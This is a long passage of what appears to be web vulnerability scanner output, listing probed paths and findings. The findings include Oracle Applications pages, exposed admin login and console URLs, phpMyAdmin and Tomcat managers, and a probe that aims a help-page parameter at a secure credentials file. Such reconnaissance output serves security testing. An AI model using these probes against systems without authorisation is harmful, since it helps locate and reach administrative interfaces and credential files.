5324+ OSVDB-3093: /OA_HTML/PTB/ICXINDEXBASECASE.htm: Oracle Applications portal pages found.
5325+ OSVDB-3093: /OA_HTML/PTB/ECXOTAPing.htm: Oracle Applications portal pages found.
5326+ OSVDB-3093: /OA_HTML/PTB/xml_sample1.htm: Oracle Applications portal pages found.
5327+ OSVDB-3093: /OA_HTML/jsp/wf/WFReassign.jsp: Oracle Applications portal pages found.
5328+ OSVDB-3093: /OA_JAVA/Oracle/: Oracle Applications portal pages found.
5329+ OSVDB-3093: /OA_JAVA/servlet.zip: Oracle Applications portal pages found.
5330+ OSVDB-3093: /OA_JAVA/oracle/forms/registry/Registry.dat: Oracle Applications portal pages found.
5331+ OSVDB-3233: /OA_HTML/jsp/: Oracle Applications portal page found
5332+ OSVDB-3233: /OA_HTML/jsp/fnd/fndversion.jsp: Oracle Applications help page found.
5333+ OSVDB-3233: /OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc: Oracle Applications help page found.
5334+ OSVDB-3233: /OA_HTML/jsp/fnd/fndhelputil.jsp: Oracle Applications help page found.
5335+ OSVDB-3092: /install/install.php: Install file found.
5336+ OSVDB-3092: /cehttp/trace: Sterling Commerce Connect Direct trace log file may contain user ID information.
5337+ OSVDB-3092: /cehttp/property/: Sterling Commerce Connect Direct configuration files.
5338+ OSVDB-3233: /doc/icodUserGuide.pdf: Instant Capacity on Demand (iCOD) UserÃÂs Guide.
5339+ OSVDB-3233: /doc/planning_SuperDome_configs.pdf: Planning HP SuperDome Configurations
5340+ OSVDB-3233: /doc/vxvm/pitc_ag.pdf: VERITAS FlashSnapTM Point-In-Time Copy Solutions documentation.
5341+ OSVDB-3233: /doc/Judy/Judy_tech_book.pdf: HP Judy documentation found.
5342+ OSVDB-3233: /doc/vxvm/vxvm_ag.pdf: Veritas Volume Manager documentation.
5343+ OSVDB-3233: /doc/vxvm/vxvm_hwnotes.pdf: Veritas Volume Manager documentation.
5344+ OSVDB-3233: /doc/vxvm/vxvm_ig.pdf: Veritas Volume Manager documentation.
5345+ OSVDB-3233: /doc/vxvm/vxvm_mig.pdf: Veritas Volume Manager documentation.
5346+ OSVDB-3233: /doc/vxvm/vxvm_tshoot.pdf: Veritas Volume Manager documentation.
5347+ OSVDB-3233: /doc/vxvm/vxvm_notes.pdf: Veritas Volume Manager documentation.
5348+ OSVDB-3233: /doc/vxvm/vxvm_ug.pdf: Veritas Volume Manager documentation.
5349+ OSVDB-3092: /staging/: This may be interesting...
5350+ OSVDB-3092: /_archive/: Archive found.
5351+ OSVDB-3092: /content/sitemap.gz: The sitemap.gz file, used for Google indexing, contains an xml representation of the web site\'s structure.
5352+ /webservices/IlaWebServices: Host has the Oracle iLearning environment installed.
5353+ /phone/: This may be interesting...
5354+ OSVDB-3092: /Admin/: This might be interesting...
5355+ OSVDB-3092: /af/: This might be interesting... potential country code (Afghanistan)
5356+ OSVDB-3092: /ax/: This might be interesting... potential country code (Aland Islands)
5357+ OSVDB-3092: /al/: This might be interesting... potential country code (Albania)
5358+ OSVDB-3092: /dz/: This might be interesting... potential country code (Algeria)
5359+ OSVDB-3092: /as/: This might be interesting... potential country code (American Samoa)
5360+ OSVDB-3092: /ad/: This might be interesting... potential country code (Andorra)
5361+ OSVDB-3092: /ao/: This might be interesting... potential country code (Angola)
5362+ OSVDB-3092: /ai/: This might be interesting... potential country code (Anguilla)
5363+ OSVDB-3092: /aq/: This might be interesting... potential country code (Antarctica)
5364+ OSVDB-3092: /ag/: This might be interesting... potential country code (Antigua And Barbuda)
5365+ OSVDB-3092: /ar/: This might be interesting... potential country code (Argentina)
5366+ OSVDB-3092: /am/: This might be interesting... potential country code (Armenia)
5367+ OSVDB-3092: /aw/: This might be interesting... potential country code (Aruba)
5368+ OSVDB-3092: /au/: This might be interesting... potential country code (Australia)
5369+ OSVDB-3092: /at/: This might be interesting... potential country code (Austria)
5370+ OSVDB-3092: /az/: This might be interesting... potential country code (Azerbaijan)
5371+ OSVDB-3092: /bs/: This might be interesting... potential country code (Bahamas)
5372+ OSVDB-3092: /bh/: This might be interesting... potential country code (Bahrain)
5373+ OSVDB-3092: /bd/: This might be interesting... potential country code (Bangladesh)
5374+ OSVDB-3092: /bb/: This might be interesting... potential country code (Barbados)
5375+ OSVDB-3092: /by/: This might be interesting... potential country code (Belarus)
5376+ OSVDB-3092: /be/: This might be interesting... potential country code (Belgium)
5377+ OSVDB-3092: /bz/: This might be interesting... potential country code (Belize)
5378+ OSVDB-3092: /bj/: This might be interesting... potential country code (Benin)
5379+ OSVDB-3092: /bm/: This might be interesting... potential country code (Bermuda)
5380+ OSVDB-3092: /bt/: This might be interesting... potential country code (Bhutan)
5381+ OSVDB-3092: /bo/: This might be interesting... potential country code (Bolivia)
5382+ OSVDB-3092: /ba/: This might be interesting... potential country code (Bosnia And Herzegovina)
5383+ OSVDB-3092: /bw/: This might be interesting... potential country code (Botswana)
5384+ OSVDB-3092: /bv/: This might be interesting... potential country code (Bouvet Island)
5385+ OSVDB-3092: /br/: This might be interesting... potential country code (Brazil)
5386+ OSVDB-3092: /io/: This might be interesting... potential country code (British Indian Ocean Territory)
5387+ OSVDB-3092: /bn/: This might be interesting... potential country code (Brunei Darussalam)
5388+ OSVDB-3092: /bg/: This might be interesting... potential country code (Bulgaria)
5389+ OSVDB-3092: /bf/: This might be interesting... potential country code (Burkina Faso)
5390+ OSVDB-3092: /bi/: This might be interesting... potential country code (Burundi)
5391+ OSVDB-3092: /kh/: This might be interesting... potential country code (Cambodia)
5392+ OSVDB-3092: /cm/: This might be interesting... potential country code (Cameroon)
5393+ OSVDB-3092: /ca/: This might be interesting... potential country code (Canada)
5394+ OSVDB-3092: /cv/: This might be interesting... potential country code (Cape Verde)
5395+ OSVDB-3092: /ky/: This might be interesting... potential country code (Cayman Islands)
5396+ OSVDB-3092: /cf/: This might be interesting... potential country code (Central African Republic)
5397+ OSVDB-3092: /td/: This might be interesting... potential country code (Chad)
5398+ OSVDB-3092: /cl/: This might be interesting... potential country code (Chile)
5399+ OSVDB-3092: /cn/: This might be interesting... potential country code (China)
5400+ OSVDB-3092: /cx/: This might be interesting... potential country code (Christmas Island)
5401+ OSVDB-3092: /cc/: This might be interesting... potential country code (Cocos (keeling) Islands)
5402+ OSVDB-3092: /co/: This might be interesting... potential country code (Colombia)
5403+ OSVDB-3092: /km/: This might be interesting... potential country code (Comoros)
5404+ OSVDB-3092: /cg/: This might be interesting... potential country code (Congo)
5405+ OSVDB-3092: /cd/: This might be interesting... potential country code (The Democratic Republic Of The Congo)
5406+ OSVDB-3092: /ck/: This might be interesting... potential country code (Cook Islands)
5407+ OSVDB-3092: /cr/: This might be interesting... potential country code (Costa Rica)
5408+ OSVDB-3092: /ci/: This might be interesting... potential country code (CÔte D'ivoire)
5409+ OSVDB-3092: /hr/: This might be interesting... potential country code (Croatia)
5410+ OSVDB-3092: /cu/: This might be interesting... potential country code (Cuba)
5411+ OSVDB-3092: /cy/: This might be interesting... potential country code (Cyprus)
5412+ OSVDB-3092: /cz/: This might be interesting... potential country code (Czech Republic)
5413+ OSVDB-3092: /dk/: This might be interesting... potential country code (Denmark)
5414+ OSVDB-3092: /dj/: This might be interesting... potential country code (Djibouti)
5415+ OSVDB-3092: /dm/: This might be interesting... potential country code (Dominica)
5416+ OSVDB-3092: /do/: This might be interesting... potential country code (Dominican Republic)
5417+ OSVDB-3092: /ec/: This might be interesting... potential country code (Ecuador)
5418+ OSVDB-3092: /eg/: This might be interesting... potential country code (Egypt)
5419+ OSVDB-3092: /sv/: This might be interesting... potential country code (El Salvador)
5420+ OSVDB-3092: /gq/: This might be interesting... potential country code (Equatorial Guinea)
5421+ OSVDB-3092: /er/: This might be interesting... potential country code (Eritrea)
5422+ OSVDB-3092: /ee/: This might be interesting... potential country code (Estonia)
5423+ OSVDB-3092: /et/: This might be interesting... potential country code (Ethiopia)
5424+ OSVDB-3092: /fk/: This might be interesting... potential country code (Falkland Islands (malvinas))
5425+ OSVDB-3092: /fo/: This might be interesting... potential country code (Faroe Islands)
5426+ OSVDB-3092: /fj/: This might be interesting... potential country code (Fiji)
5427+ OSVDB-3092: /fi/: This might be interesting... potential country code (Finland)
5428+ OSVDB-3092: /fr/: This might be interesting... potential country code (France)
5429+ OSVDB-3092: /gf/: This might be interesting... potential country code (French Guiana)
5430+ OSVDB-3092: /pf/: This might be interesting... potential country code (French Polynesia)
5431+ OSVDB-3092: /tf/: This might be interesting... potential country code (French Southern Territories)
5432+ OSVDB-3092: /ga/: This might be interesting... potential country code (Gabon)
5433+ OSVDB-3092: /gm/: This might be interesting... potential country code (Gambia)
5434+ OSVDB-3092: /ge/: This might be interesting... potential country code (Georgia)
5435+ OSVDB-3092: /de/: This might be interesting... potential country code (Germany)
5436+ OSVDB-3092: /gh/: This might be interesting... potential country code (Ghana)
5437+ OSVDB-3092: /gi/: This might be interesting... potential country code (Gibraltar)
5438+ OSVDB-3092: /gr/: This might be interesting... potential country code (Greece)
5439+ OSVDB-3092: /gl/: This might be interesting... potential country code (Greenland)
5440+ OSVDB-3092: /gd/: This might be interesting... potential country code (Grenada)
5441+ OSVDB-3092: /gp/: This might be interesting... potential country code (Guadeloupe)
5442+ OSVDB-3092: /gu/: This might be interesting... potential country code (Guam)
5443+ OSVDB-3092: /gt/: This might be interesting... potential country code (Guatemala)
5444+ OSVDB-3092: /gg/: This might be interesting... potential country code (Guernsey)
5445+ OSVDB-3092: /gn/: This might be interesting... potential country code (Guinea)
5446+ OSVDB-3092: /gw/: This might be interesting... potential country code (Guinea-bissau)
5447+ OSVDB-3092: /gy/: This might be interesting... potential country code (Guyana)
5448+ OSVDB-3092: /ht/: This might be interesting... potential country code (Haiti)
5449+ OSVDB-3092: /hm/: This might be interesting... potential country code (Heard Island And Mcdonald Islands)
5450+ OSVDB-3092: /va/: This might be interesting... potential country code (Holy See (vatican City State))
5451+ OSVDB-3092: /hn/: This might be interesting... potential country code (Honduras)
5452+ OSVDB-3092: /hk/: This might be interesting... potential country code (Hong Kong)
5453+ OSVDB-3092: /hu/: This might be interesting... potential country code (Hungary)
5454+ OSVDB-3092: /is/: This might be interesting... potential country code (Iceland)
5455+ OSVDB-3092: /in/: This might be interesting... potential country code (India)
5456+ OSVDB-3092: /id/: This might be interesting... potential country code (Indonesia)
5457+ OSVDB-3092: /ir/: This might be interesting... potential country code (Islamic Republic Of Iran)
5458+ OSVDB-3092: /iq/: This might be interesting... potential country code (Iraq)
5459+ OSVDB-3092: /ie/: This might be interesting... potential country code (Ireland)
5460+ OSVDB-3092: /im/: This might be interesting... potential country code (Isle Of Man)
5461+ OSVDB-3092: /il/: This might be interesting... potential country code (Israel)
5462+ OSVDB-3092: /it/: This might be interesting... potential country code (Italy)
5463+ OSVDB-3092: /jm/: This might be interesting... potential country code (Jamaica)
5464+ OSVDB-3092: /jp/: This might be interesting... potential country code (Japan)
5465+ OSVDB-3092: /je/: This might be interesting... potential country code (Jersey)
5466+ OSVDB-3092: /jo/: This might be interesting... potential country code (Jordan)
5467+ OSVDB-3092: /kz/: This might be interesting... potential country code (Kazakhstan)
5468+ OSVDB-3092: /ke/: This might be interesting... potential country code (Kenya)
5469+ OSVDB-3092: /ki/: This might be interesting... potential country code (Kiribati)
5470+ OSVDB-3092: /kp/: This might be interesting... potential country code (Democratic People's Republic Of Korea)
5471+ OSVDB-3092: /kr/: This might be interesting... potential country code (Republic Of Korea)
5472+ OSVDB-3092: /kw/: This might be interesting... potential country code (Kuwait)
5473+ OSVDB-3092: /kg/: This might be interesting... potential country code (Kyrgyzstan)
5474+ OSVDB-3092: /la/: This might be interesting... potential country code (Lao People's Democratic Republic)
5475+ OSVDB-3092: /lv/: This might be interesting... potential country code (Latvia)
5476+ OSVDB-3092: /lb/: This might be interesting... potential country code (Lebanon)
5477+ OSVDB-3092: /ls/: This might be interesting... potential country code (Lesotho)
5478+ OSVDB-3092: /lr/: This might be interesting... potential country code (Liberia)
5479+ OSVDB-3092: /ly/: This might be interesting... potential country code (Libyan Arab Jamahiriya)
5480+ OSVDB-3092: /li/: This might be interesting... potential country code (Liechtenstein)
5481+ OSVDB-3092: /lt/: This might be interesting... potential country code (Lithuania)
5482+ OSVDB-3092: /lu/: This might be interesting... potential country code (Luxembourg)
5483+ OSVDB-3092: /mo/: This might be interesting... potential country code (Macao)
5484+ OSVDB-3092: /mk/: This might be interesting... potential country code (Macedonia)
5485+ OSVDB-3092: /mg/: This might be interesting... potential country code (Madagascar)
5486+ OSVDB-3092: /mw/: This might be interesting... potential country code (Malawi)
5487+ OSVDB-3092: /my/: This might be interesting... potential country code (Malaysia)
5488+ OSVDB-3092: /mv/: This might be interesting... potential country code (Maldives)
5489+ OSVDB-3092: /ml/: This might be interesting... potential country code (Mali)
5490+ OSVDB-3092: /mt/: This might be interesting... potential country code (Malta)
5491+ OSVDB-3092: /mh/: This might be interesting... potential country code (Marshall Islands)
5492+ OSVDB-3092: /mq/: This might be interesting... potential country code (Martinique)
5493+ OSVDB-3092: /mr/: This might be interesting... potential country code (Mauritania)
5494+ OSVDB-3092: /mu/: This might be interesting... potential country code (Mauritius)
5495+ OSVDB-3092: /yt/: This might be interesting... potential country code (Mayotte)
5496+ OSVDB-3092: /mx/: This might be interesting... potential country code (Mexico)
5497+ OSVDB-3092: /fm/: This might be interesting... potential country code (Federated States Of Micronesia)
5498+ OSVDB-3092: /md/: This might be interesting... potential country code (Republic Of Moldova)
5499+ OSVDB-3092: /mc/: This might be interesting... potential country code (Monaco)
5500+ OSVDB-3092: /mn/: This might be interesting... potential country code (Mongolia)
5501+ OSVDB-3092: /me/: This might be interesting... potential country code (Montenegro)
5502+ OSVDB-3092: /ms/: This might be interesting... potential country code (Montserrat)
5503+ OSVDB-3092: /ma/: This might be interesting... potential country code (Morocco)
5504+ OSVDB-3092: /mz/: This might be interesting... potential country code (Mozambique)
5505+ OSVDB-3092: /mm/: This might be interesting... potential country code (Myanmar)
5506+ OSVDB-3092: /na/: This might be interesting... potential country code (Namibia)
5507+ OSVDB-3092: /nr/: This might be interesting... potential country code (Nauru)
5508+ OSVDB-3092: /np/: This might be interesting... potential country code (Nepal)
5509+ OSVDB-3092: /nl/: This might be interesting... potential country code (Netherlands)
5510+ OSVDB-3092: /an/: This might be interesting... potential country code (Netherlands Antilles)
5511+ OSVDB-3092: /nc/: This might be interesting... potential country code (New Caledonia)
5512+ OSVDB-3092: /nz/: This might be interesting... potential country code (New Zealand)
5513+ OSVDB-3092: /ni/: This might be interesting... potential country code (Nicaragua)
5514+ OSVDB-3092: /ne/: This might be interesting... potential country code (Niger)
5515+ OSVDB-3092: /ng/: This might be interesting... potential country code (Nigeria)
5516+ OSVDB-3092: /nu/: This might be interesting... potential country code (Niue)
5517+ OSVDB-3092: /nf/: This might be interesting... potential country code (Norfolk Island)
5518+ OSVDB-3092: /mp/: This might be interesting... potential country code (Northern Mariana Islands)
5519+ OSVDB-3092: /no/: This might be interesting... potential country code (Norway)
5520+ OSVDB-3092: /om/: This might be interesting... potential country code (Oman)
5521+ OSVDB-3092: /pk/: This might be interesting... potential country code (Pakistan)
5522+ OSVDB-3092: /pw/: This might be interesting... potential country code (Palau)
5523+ OSVDB-3092: /ps/: This might be interesting... potential country code (Palestinian Territory)
5524+ OSVDB-3092: /pa/: This might be interesting... potential country code (Panama)
5525+ OSVDB-3092: /pg/: This might be interesting... potential country code (Papua New Guinea)
5526+ OSVDB-3092: /py/: This might be interesting... potential country code (Paraguay)
5527+ OSVDB-3092: /pe/: This might be interesting... potential country code (Peru)
5528+ OSVDB-3092: /ph/: This might be interesting... potential country code (Philippines)
5529+ OSVDB-3092: /pn/: This might be interesting... potential country code (Pitcairn)
5530+ OSVDB-3092: /pl/: This might be interesting... potential country code (Poland)
5531+ OSVDB-3092: /pt/: This might be interesting... potential country code (Portugal)
5532+ OSVDB-3092: /pr/: This might be interesting... potential country code (Puerto Rico)
5533+ OSVDB-3092: /qa/: This might be interesting... potential country code (Qatar)
5534+ OSVDB-3092: /re/: This might be interesting... potential country code (RÉunion)
5535+ OSVDB-3092: /ro/: This might be interesting... potential country code (Romania)
5536+ OSVDB-3092: /ru/: This might be interesting... potential country code (Russian Federation)
5537+ OSVDB-3092: /rw/: This might be interesting... potential country code (Rwanda)
5538+ OSVDB-3092: /bl/: This might be interesting... potential country code (Saint BarthÉlemy)
5539+ OSVDB-3092: /sh/: This might be interesting... potential country code (Saint Helena)
5540+ OSVDB-3092: /kn/: This might be interesting... potential country code (Saint Kitts And Nevis)
5541+ OSVDB-3092: /lc/: This might be interesting... potential country code (Saint Lucia)
5542+ OSVDB-3092: /mf/: This might be interesting... potential country code (Saint Martin)
5543+ OSVDB-3092: /pm/: This might be interesting... potential country code (Saint Pierre And Miquelon)
5544+ OSVDB-3092: /vc/: This might be interesting... potential country code (Saint Vincent And The Grenadines)
5545+ OSVDB-3092: /ws/: This might be interesting... potential country code (Samoa)
5546+ OSVDB-3092: /sm/: This might be interesting... potential country code (San Marino)
5547+ OSVDB-3092: /st/: This might be interesting... potential country code (Sao Tome And Principe)
5548+ OSVDB-3092: /sa/: This might be interesting... potential country code (Saudi Arabia)
5549+ OSVDB-3092: /sn/: This might be interesting... potential country code (Senegal)
5550+ OSVDB-3092: /rs/: This might be interesting... potential country code (Serbia)
5551+ OSVDB-3092: /sc/: This might be interesting... potential country code (Seychelles)
5552+ OSVDB-3092: /sl/: This might be interesting... potential country code (Sierra Leone)
5553+ OSVDB-3092: /sg/: This might be interesting... potential country code (Singapore)
5554+ OSVDB-3092: /sk/: This might be interesting... potential country code (Slovakia)
5555+ OSVDB-3092: /si/: This might be interesting... potential country code (Slovenia)
5556+ OSVDB-3092: /sb/: This might be interesting... potential country code (Solomon Islands)
5557+ OSVDB-3092: /so/: This might be interesting... potential country code (Somalia)
5558+ OSVDB-3092: /za/: This might be interesting... potential country code (South Africa)
5559+ OSVDB-3092: /gs/: This might be interesting... potential country code (South Georgia And The South Sandwich Islands)
5560+ OSVDB-3092: /es/: This might be interesting... potential country code (Spain)
5561+ OSVDB-3092: /lk/: This might be interesting... potential country code (Sri Lanka)
5562+ OSVDB-3092: /sd/: This might be interesting... potential country code (Sudan)
5563+ OSVDB-3092: /sr/: This might be interesting... potential country code (Suriname)
5564+ OSVDB-3092: /sj/: This might be interesting... potential country code (Svalbard And Jan Mayen)
5565+ OSVDB-3092: /sz/: This might be interesting... potential country code (Swaziland)
5566+ OSVDB-3092: /se/: This might be interesting... potential country code (Sweden)
5567+ OSVDB-3092: /ch/: This might be interesting... potential country code (Switzerland)
5568+ OSVDB-3092: /sy/: This might be interesting... potential country code (Syrian Arab Republic)
5569+ OSVDB-3092: /tw/: This might be interesting... potential country code (Taiwan)
5570+ OSVDB-3092: /tj/: This might be interesting... potential country code (Tajikistan)
5571+ OSVDB-3092: /tz/: This might be interesting... potential country code (United Republic Of Tanzania)
5572+ OSVDB-3092: /th/: This might be interesting... potential country code (Thailand)
5573+ OSVDB-3092: /tl/: This might be interesting... potential country code (Timor-leste)
5574+ OSVDB-3092: /tg/: This might be interesting... potential country code (Togo)
5575+ OSVDB-3092: /tk/: This might be interesting... potential country code (Tokelau)
5576+ OSVDB-3092: /to/: This might be interesting... potential country code (Tonga)
5577+ OSVDB-3092: /tt/: This might be interesting... potential country code (Trinidad And Tobago)
5578+ OSVDB-3092: /tn/: This might be interesting... potential country code (Tunisia)
5579+ OSVDB-3092: /tr/: This might be interesting... potential country code (Turkey)
5580+ OSVDB-3092: /tm/: This might be interesting... potential country code (Turkmenistan)
5581+ OSVDB-3092: /tc/: This might be interesting... potential country code (Turks And Caicos Islands)
5582+ OSVDB-3092: /tv/: This might be interesting... potential country code (Tuvalu)
5583+ OSVDB-3092: /ug/: This might be interesting... potential country code (Uganda)
5584+ OSVDB-3092: /ua/: This might be interesting... potential country code (Ukraine)
5585+ OSVDB-3092: /ae/: This might be interesting... potential country code (United Arab Emirates)
5586+ OSVDB-3092: /gb/: This might be interesting... potential country code (United Kingdom)
5587+ OSVDB-3092: /us/: This might be interesting... potential country code (United States)
5588+ OSVDB-3092: /um/: This might be interesting... potential country code (United States Minor Outlying Islands)
5589+ OSVDB-3092: /uy/: This might be interesting... potential country code (Uruguay)
5590+ OSVDB-3092: /uz/: This might be interesting... potential country code (Uzbekistan)
5591+ OSVDB-3092: /vu/: This might be interesting... potential country code (Vanuatu)
5592+ OSVDB-3092: /ve/: This might be interesting... potential country code (Venezuela)
5593+ OSVDB-3092: /vn/: This might be interesting... potential country code (Viet Nam)
5594+ OSVDB-3092: /vg/: This might be interesting... potential country code (British Virgin Islands)
5595+ OSVDB-3092: /vi/: This might be interesting... potential country code (U.S. Virgin Islands)
5596+ OSVDB-3092: /wf/: This might be interesting... potential country code (Wallis And Futuna)
5597+ OSVDB-3092: /eh/: This might be interesting... potential country code (Western Sahara)
5598+ OSVDB-3092: /ye/: This might be interesting... potential country code (Yemen)
5599+ OSVDB-3092: /zm/: This might be interesting... potential country code (Zambia)
5600+ OSVDB-3092: /zw/: This might be interesting... potential country code (Zimbabwe)
5601+ OSVDB-3092: /www/2: This might be interesting...
5602+ OSVDB-3093: /includes/sendmail.inc: Include files (.inc) should not be served in plain text.
5603+ /config/config.txt: Configuration file found.
5604+ /config/readme.txt: Readme file found.
5605+ /data/readme.txt: Readme file found.
5606+ /log/readme.txt: Readme file found.
5607+ /logs/readme.txt: Readme file found.
5608+ /uploads/readme.txt: Readme file found.
5609+ /admin/account.asp: Admin login page/section found.
5610+ /admin/account.html: Admin login page/section found.
5611+ /admin/account.php: Admin login page/section found.
5612+ /admin/controlpanel.asp: Admin login page/section found.
5613+ /admin/controlpanel.html: Admin login page/section found.
5614+ /admin/controlpanel.php: Admin login page/section found.
5615+ /admin/cp.asp: Admin login page/section found.
5616+ /admin/cp.html: Admin login page/section found.
5617+ /admin/cp.php: Admin login page/section found.
5618+ /admin/home.asp: Admin login page/section found.
5619+ /admin/home.php: Admin login page/section found.
5620+ /admin/index.asp: Admin login page/section found.
5621+ /admin/index.html: Admin login page/section found.
5622+ /admin/login.asp: Admin login page/section found.
5623+ /admin/login.html: Admin login page/section found.
5624+ /admin/login.php: Admin login page/section found.
5625+ /admin1/: Admin login page/section found.
5626+ /admin4_account/: Admin login page/section found.
5627+ /admin4_colon/: Admin login page/section found.
5628+ /administer/: Admin login page/section found.
5629+ /administr8/: Admin login page/section found.
5630+ /administracao/: Admin login page/section found.
5631+ /administracion/: Admin login page/section found.
5632+ /administrateur/: Admin login page/section found.
5633+ /administratie/: Admin login page/section found.
5634+ /administration/: Admin login page/section found.
5635+ /administrator/account.asp: Admin login page/section found.
5636+ /administrator/account.html: Admin login page/section found.
5637+ /administrator/account.php: Admin login page/section found.
5638+ /administrator/index.asp: Admin login page/section found.
5639+ /administrator/index.html: Admin login page/section found.
5640+ /administrator/index.php: Admin login page/section found.
5641+ /administrator/login.asp: Admin login page/section found.
5642+ /administrator/login.html: Admin login page/section found.
5643+ /administrator/login.php: Admin login page/section found.
5644+ /administratoraccounts/: Admin login page/section found.
5645+ /administrators/: Admin login page/section found.
5646+ /administrivia/: Admin login page/section found.
5647+ /adminpro/: Admin login page/section found.
5648+ /admins/: Admin login page/section found.
5649+ /AdminTools/: Admin login page/section found.
5650+ /amministratore/: Admin login page/section found.
5651+ /autologin/: Admin login page/section found.
5652+ /banneradmin/: Admin login page/section found.
5653+ /bbadmin/: Admin login page/section found.
5654+ /beheerder/: Admin login page/section found.
5655+ /bigadmin/: Admin login page/section found.
5656+ /blogindex/: Admin login page/section found.
5657+ /cadmins/: Admin login page/section found.
5658+ /ccms/: Admin login page/section found.
5659+ /ccms/index.php: Admin login page/section found.
5660+ /ccms/login.php: Admin login page/section found.
5661+ /ccp14admin/: Admin login page/section found.
5662+ /cmsadmin/: Admin login page/section found.
5663+ /configuration/: Admin login page/section found.
5664+ /configure/: Admin login page/section found.
5665+ /controlpanel/: Admin login page/section found.
5666+ /cpanel_file/: Admin login page/section found.
5667+ /customer_login/: Admin login page/section found.
5668+ /database_administration/: Admin login page/section found.
5669+ /Database_Administration/: Admin login page/section found.
5670+ /dir-login/: Admin login page/section found.
5671+ /directadmin/: Admin login page/section found.
5672+ /ezsqliteadmin/: Admin login page/section found.
5673+ /formslogin/: Admin login page/section found.
5674+ /globes_admin/: Admin login page/section found.
5675+ /hpwebjetadmin/: Admin login page/section found.
5676+ /Indy_admin/: Admin login page/section found.
5677+ /irc-macadmin/: Admin login page/section found.
5678+ /LiveUser_Admin/: Admin login page/section found.
5679+ /login_db/: Admin login page/section found.
5680+ /login-redirect/: Admin login page/section found.
5681+ /login-us/: Admin login page/section found.
5682+ /login1/: Admin login page/section found.
5683+ /loginflat/: Admin login page/section found.
5684+ /logo_sysadmin/: Admin login page/section found.
5685+ /Lotus_Domino_Admin/: Admin login page/section found.
5686+ /macadmin/: Admin login page/section found.
5687+ /maintenance/: Admin login page/section found.
5688+ /manuallogin/: Admin login page/section found.
5689+ /memlogin/: Admin login page/section found.
5690+ /meta_login/: Admin login page/section found.
5691+ /modelsearch/login.asp: Admin login page/section found.
5692+ /modelsearch/login.php: Admin login page/section found.
5693+ /moderator/: Admin login page/section found.
5694+ /moderator/admin.asp: Admin login page/section found.
5695+ /moderator/admin.html: Admin login page/section found.
5696+ /moderator/admin.php: Admin login page/section found.
5697+ /moderator/login.asp: Admin login page/section found.
5698+ /moderator/login.html: Admin login page/section found.
5699+ /moderator/login.php: Admin login page/section found.
5700+ /myadmin/: Admin login page/section found.
5701+ /navSiteAdmin/: Admin login page/section found.
5702+ /newsadmin/: Admin login page/section found.
5703+ /openvpnadmin/: Admin login page/section found.
5704+ /painel/: Admin login page/section found.
5705+ /panel/: Admin login page/section found.
5706+ /pgadmin/: Admin login page/section found.
5707+ /phpldapadmin/: Admin login page/section found.
5708+ /phppgadmin/: Admin login page/section found.
5709+ /phpSQLiteAdmin/: Admin login page/section found.
5710+ /platz_login/: Admin login page/section found.
5711+ /power_user/: Admin login page/section found.
5712+ /project-admins/: Admin login page/section found.
5713+ /pureadmin/: Admin login page/section found.
5714+ /radmind-1/: Admin login page/section found.
5715+ /radmind/: Admin login page/section found.
5716+ /rcLogin/: Admin login page/section found.
5717+ /server_admin_small/: Admin login page/section found.
5718+ /ServerAdministrator/: Admin login page/section found.
5719+ /showlogin/: Admin login page/section found.
5720+ /simpleLogin/: Admin login page/section found.
5721+ /smblogin/: Admin login page/section found.
5722+ /sql-admin/: Admin login page/section found.
5723+ /ss_vms_admin_sm/: Admin login page/section found.
5724+ /sshadmin/: Admin login page/section found.
5725+ /staradmin/: Admin login page/section found.
5726+ /sub-login/: Admin login page/section found.
5727+ /Super-Admin/: Admin login page/section found.
5728+ /support_login/: Admin login page/section found.
5729+ /sys-admin/: Admin login page/section found.
5730+ /sysadmin/: Admin login page/section found.
5731+ /SysAdmin/: Admin login page/section found.
5732+ /SysAdmin2/: Admin login page/section found.
5733+ /sysadmins/: Admin login page/section found.
5734+ /system_administration/: Admin login page/section found.
5735+ /system-administration/: Admin login page/section found.
5736+ /ur-admin/: Admin login page/section found.
5737+ /useradmin/: Admin login page/section found.
5738+ /UserLogin/: Admin login page/section found.
5739+ /utility_login/: Admin login page/section found.
5740+ /v2/painel/: Admin login page/section found.
5741+ /vadmind/: Admin login page/section found.
5742+ /vmailadmin/: Admin login page/section found.
5743+ /webmaster/: Admin login page/section found.
5744+ /websvn/: Admin login page/section found.
5745+ /wizmysqladmin/: Admin login page/section found.
5746+ /wp-admin/: Admin login page/section found.
5747+ /wp-login/: Admin login page/section found.
5748+ /xlogin/: Admin login page/section found.
5749+ /maint/: This might be interesting...
5750+ /jk-status: mod_jk status page is visible.
5751+ /balancer-manager: mod_proxy_balancer management page is visible.
5752+ /servlets-examples/: Tomcat servlets examples are visible.
5753+ /admin-console: JBoss admin console is visible.
5754+ /gif/hp_invent_logo.gif: This device may be an HP printer/scanner and allow retrieval of previously scanned images.
5755+ /gif/tricolor_ink_guage.gif: This device may be an HP printer/scanner and allow retrieval of previously scanned images.
5756+ OSVDB-3092: /messages/: This might be interesting...
5757+ OSVDB-3092: /cms/: This might be interesting...
5758+ OSVDB-3092: /helpdesk/: This might be interesting...
5759+ /3rdparty/phpMyAdmin/: phpMyAdmin directory found
5760+ /phpMyAdmin/: phpMyAdmin directory found
5761+ /3rdparty/phpmyadmin/: phpMyAdmin directory found
5762+ /phpmyadmin/: phpMyAdmin directory found
5763+ /pma/: phpMyAdmin directory found
5764+ /spin/main.csp: CA iTechnology SPIN interface found
5765+ /openadmin/: Informix OpenAdmin tool administration login
5766+ /mobileadmin/db/MobileAdminDB.sqlite: RoveIT Mobile Admin internal database is available for download
5767+ /adfs/ls/?wa=wsignout1.0: Active Directory Federation Services sign out page found.
5768+ /adfs/ls/?wa=wsignin1.0&wtrealm=http://www.cirt.net/: Active Directory Federation Services sign in page found.
5769+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
5770+ /jk-manager/html: Tomcat Manager / Host Manager interface found (pass protected)
5771+ /jk-status/html: Tomcat Manager / Host Manager interface found (pass protected)
5772+ /admin/html: Tomcat Manager / Host Manager interface found (pass protected)
5773+ /host-manager/html: Tomcat Manager / Host Manager interface found (pass protected)
5774+ OSVDB-96181: /adfs/services/proxytrustpolicystoretransfer: Active Directory Federation Services page found.
5775+ OSVDB-96181: /adfs/fs/federationserverservice.asmx: Active Directory Federation Services page found.
5776+ OSVDB-96181: /adfs/services/trust/samlprotocol/proxytrust: Active Directory Federation Services page found.
5777+ OSVDB-96181: /adfs/services/trust/mexsoap: Active Directory Federation Services page found.
